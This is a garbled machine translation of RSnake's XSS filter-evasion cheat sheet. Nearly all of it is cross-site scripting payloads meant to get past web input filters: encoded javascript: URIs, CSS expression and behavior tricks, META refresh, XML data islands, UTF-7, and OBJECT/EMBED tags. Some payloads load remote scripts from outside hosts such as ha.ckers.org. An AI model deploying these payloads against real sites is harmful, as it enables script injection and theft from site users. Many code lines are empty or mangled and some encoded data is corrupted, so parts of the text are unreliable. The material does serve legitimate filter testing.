Translation: XSS bypass Filtering

If you do not know how to perform XSS attacks, this article may not help you. This article focuses on the readers who have some knowledge about basic XSS attacks and want to have a deeper understanding of the details about bypassing filtering. This article does not tell you how to reduce the impact of XSS or how to write some actual attack code. You can simply get some basic methods to guess the rest.
(The introduction part is omitted, the basic part is also omitted, and the sin is expected to include a large number of RSnake adults)

Case-insensitive XSS
Code:

Contains HTML characters
Code:

Shen note obfuscation (If your colleague needs to use a single double quotation mark, you can use Shen note to put it into a javascript string. Because many filters do not understand Shen note, this vulnerability is caused)
Code:

Malformed IMG tags. Initially discovered by Beqeek (which can work in all browsers after being streamlined), this method leverages a loose Graphics Rendering Engine to allow us to create our own XSS In the IMG Tag surrounded by quotation marks.
Code: <SCRIPT> alert ("XSS") </SCRIPT> ">

FromCharCode if you cannot use quotation marks, you can use fromCharCode for eval functions.
Code:

UTF-8 Coding
Code:

Long UTF-8 encoding can bypass some regular checks without using semicolons
Code:

Hex Encoding without semicolons
Code:

Embed the TAB key to attack
Code:

Embedded encoded TAB key
Code:

XSS can be implemented when a new line is embedded. Some websites say that char 09-13 can be used for XSS attack services, which is obviously incorrect. Only 09 10 13 can work normally.
Code:
Code:
Code:
SRC
=
"
J
A
V
A
S
C
R
I
P
T
:
A
L
E
R
T
(
'
X
S
S
'
)
"
>

NULL characters can escape many filtering systems
Code: perl-e 'print ''; '> out
Code: perl-e 'print '<SCR \ 0ip> alert (\ "XSS \") </SCR \ 0ip> ";'> out

Extra open brackets. Submit franzzedel Mayr, the XSS vector can defeat some detection engines by using the matching first Open and Close Angle brackets to compare and then work in the label, instead of being like Boye-Moore, it looks more effective for algorythm to match the Open Angle brackets and related labels for the entire string (then lift the confusion, of course ). The outcome-independent bracket proposed in the double-slash comments is used to stop JavaScript errors:
Code: <SCRIPT> alert ("XSS"); // </SCRIPT>

Unclosed labels
Code: <script src = http://ha.ckers.org/xss.js? <B>

Unclosed img or iframe labels
Code:

Xss without single quotes
Code: <SCRIPT> alert (/XSS/. source) </SCRIPT>

Various other labels
Code: <input type = "IMAGE" SRC = "javascript: alert ('xsss');">
Code: <body background = "javascript: alert ('xsss')">
Code: <body onload = alert ('xss')>
Code:
Code: <bgsound src = "javascript: alert ('xss');">
Code: <br size = "& {alert ('xss')}"> (netspace)
Code: <link rel = "stylesheet" HREF = "javascript: alert ('xss');">
Code: <link rel = "stylesheet" HREF = "http://ha.ckers.org/xss.css">
Code: <STYLE> @ import 'HTTP: // ha.ckers.org/xss.css'; </STYLE>
Code: <META HTTP-EQUIV = "Link" Content = "Code: <STYLE> BODY {-moz-binding: url ("http://ha.ckers.org/xss#.xml#xss")} </STYLE>
Code: <xss style = "behavior: url (xss. htc);">
Code: <STYLE> li {list-style-image: url ("javascript: alert ('xsss')") ;}</STYLE> <UL> <LI> XSS
Code: (netscape only)
Code: (netscape only)
Code: <table background = "javascript: alert ('xsss')">
Code: <iframe src = "javascript: alert ('xss');"> </IFRAME>
Code: <TABLE> <td background = "javascript: alert ('xsss')">
Code: <div style = "background-image: url (javascript: alert ('xsss')">
Code: <base href = "javascript: alert ('xss'); //">

US_ASCII encoding (detected by bolt ). Using 7-bit ascii encoding instead of 8-bit can bypass many filters. But the server must be US-ASCII-encoded for interaction. Currently, only Apache Tomcat interacts in this way.
Code :? Scriptualert (EXSSE )? /Scriptu

META Protocol
Code: <META HTTP-EQUIV = "refresh" CONTENT = "0; url = javascript: alert ('xsss');">
Code: <META HTTP-EQUIV = "refresh" CONTENT = "0; url = data: text/html; base64, PHNjcmlwdD5hbGVydCgnWFNTJyk8L3NjcmlwdD4K">
Code: <META HTTP-EQUIV = "refresh" CONTENT = "0; URL = http: //; URL = javascript: alert ('xss');">

Unicode encoding for DIV
Code: <div style = "background-image: \ 0075 \ 0072 \ 006C \ 0028 '\ 006a \ 0061 \ 0076 \ 0061 \ 0073 \ 0063 \ 0072 \ 0069 \ 0070 \ 0074 \ 003a \ 0061 \ 006c \ 0065 \ 0072 \ 0074 \ 0028.1027 \ 0058.1053 \ 0053 \ 0027 \ 0029 '\ 0029 ">

Use expression attributes
Code: <div style = "width: expression (alert ('xss');">

STYLE label
Code: <STYLE> @ im \ port '\ ja \ vasc \ rept: alert ("XSS")'; </STYLE>
Code: <style type = "text/javascript"> alert ('xsss'); </STYLE>
Code: <STYLE>. XSS {background-image: url ("javascript: alert ('xss')") ;}</STYLE> <A> </A>
Code: <STYLE type = "text/css"> BODY {background: url ("javascript: alert ('xsss')")} </STYLE>

OBJECT tag
Code: <object type = "text/x-scriptlet" DATA = "http://ha.ckers.org/scriptlet.html"> </OBJECT>
Code: <OBJECT classid = clsid: ae24fdae-03c6-11d1-8b76-0080c744f389> <param name = url value = javascript: alert ('xsss')> </OBJECT>

EMBED label
Code: <embed src = "http://www.bkjia.com/xss.swf" AllowScriptAccess = "always"> </EMBED>
Code: <embed src = "data: image/svg + xml; base64, zookeeper zookeeper + YWxlcnQoIlh tuyipozwvc2nyaxb0p1_vc3znpg = "type =" image/svg + xml "AllowScriptAccess =" always "> </EMBED>
Use the following code in a flash file:
Code: a = "get ";
B = "URL (\"";
C = "javascript :";
D = "alert ('xss ');\")";
Eval (a + B + c + d );

XML namespace can introduce the behavior file htc but must be on the same server
Code: <HTML xmlns: xss>
<? Import namespace = "xss" implementation = "http://ha.ckers.org/xss.htc">
<Xss: xss> XSS </xss: xss>
</HTML>
Xss. htc: <PUBLIC: component tagname = "xss">
<PUBLIC: attach event = "ondocumentready" ONEVENT = "main ()" LITERALCONTENT = "false"/>
</PUBLIC: COMPONENT>
<SCRIPT>
Function main ()
{
Alert ("XSS ");
}
</SCRIPT>

XML Data Islands blurred by CDATA
Cdoe: <xml id = I> <X> <C> <! [CDATA [ <! [CDATA [Warning: alert ('xss'); ">]>
</C> </X> </xml> <span datasrc = # I dataworkflow = C DATAFORMATAS = HTML> </SPAN>

XML data island
Code: <xml id = "xss"> <I> <B> & lt; IMG SRC = "javas <! --> Alert: alert ('xss') "& gt; </B> </I> </XML>
<Span datasrc = "# xss" dataworkflow = "B" DATAFORMATAS = "HTML"> </SPAN>

Code: <xml src = "xsstest. xml" ID = I> </XML>
<Span datasrc = # I dataworkflow = C DATAFORMATAS = HTML> </SPAN>
(Xsstest. xml) must be in the same domain

HTML + TIME
Code: <HTML> <BODY>
<? Xml: namespace prefix = "t" ns = "urn: schemas-microsoft-com: time">
<? Import namespace = "t" implementation = "# default # time2">
<T: set attributeName = "innerHTML" to = "XSS & lt; script defer & gt; alert (& quot; XSS & quot;) & lt;/SCRIPT & gt; ">
</BODY> </HTML>
UTF7 Encoding
Code: <HEAD> <META HTTP-EQUIV = "CONTENT-TYPE" CONTENT = "text/html; charset = UTF-7 "> </HEAD> + ADw-SCRIPT + AD4-alert ('xss'); + ADw-/SCRIPT + AD4-

Prevents the expression statement from being executed twice
<A STYLE = "x: expression (window. r! = 1 )? (Window. r = 1, eval (x. t): 1) ">
<X id = x t = "alert (0)">

Author: RSnake
Translation: Emperor shitian